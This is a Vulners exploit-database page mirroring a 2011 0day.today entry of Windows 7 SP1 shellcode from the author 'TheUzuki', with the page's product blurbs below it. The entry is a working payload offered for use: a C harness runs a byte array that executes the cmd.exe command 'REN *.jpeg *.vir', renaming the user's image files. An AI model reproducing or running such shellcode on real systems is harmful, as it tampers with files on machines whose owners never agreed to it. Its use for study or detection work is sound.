Lucene search
K

win32 / Windows7 Sp1 - rename .jpeg to .vir - 57 bytes

🗓️ 23 Jul 2011 00:00:00Reported by TheUzukiType 
zdt
 zdt
🔗 0day.today👁 17 Views

Win32 / Windows7 Sp1 - rename .jpeg to .vir - 57 byte

Code
# Exploit Title: Win32 / Windows7 Sp1 - rename .jpeg to .vir (57 bytes)
# Date: July, 23 2011
# Author: Theuzuki.'
# Vendor or Software Link: -
# Version: -
# Category:: shellcodes
# Google dork: -
# Tested on: Windows 7 sp 1
# Demo site: -

==================================================
Made by:

___________.__            ____ ___               __   .__ 
\__    ___/|  |__   ____ |    |   \__________ __|  | _|__|
  |    |   |  |  \_/ __ \|    |   /\___   /  |  \  |/ /  |
  |    |   |   Y  \  ___/|    |  /  /    /|  |  /    <|  |
  |____|   |___|  /\___  >______/  /_____ \____/|__|_ \__|
                \/     \/Rats Crew       \/ TheCod3r \/  



Mail: [email protected]
Website: www.thecoder.co.tv
Nicknames: TheUzuki.' / TheCod3r
Greeting: TheRats Crew
==================================================

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
 
char code[] = "\xeb\x16\x5b\x31\xc0\x50"
"\x53\xbb\x39\xe7\x99\x75\xff\xd3\x31\xc0"
"\x50\xbb\x6f\x2a\x96\x75\xff\xd3\xe8\xe5"
"\xff\xff\xff\x63\x6d\x64\x2e\x65\x78\x65"
"\x20\x52\x45\x4e\x20\x2a\x2e\x6a\x70\x65"
"\x67\x20\x2a\x2e\x76\x69\x72\x00";
 
int main(int argc, char **argv)
{
    ((void (*)())code)();
    printf("Renaming all .jpeg files to .vir files");
    return 0;
} 


Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

23 Jul 2011 00:00Current
0.1Low risk
Vulners AI Score0.1
17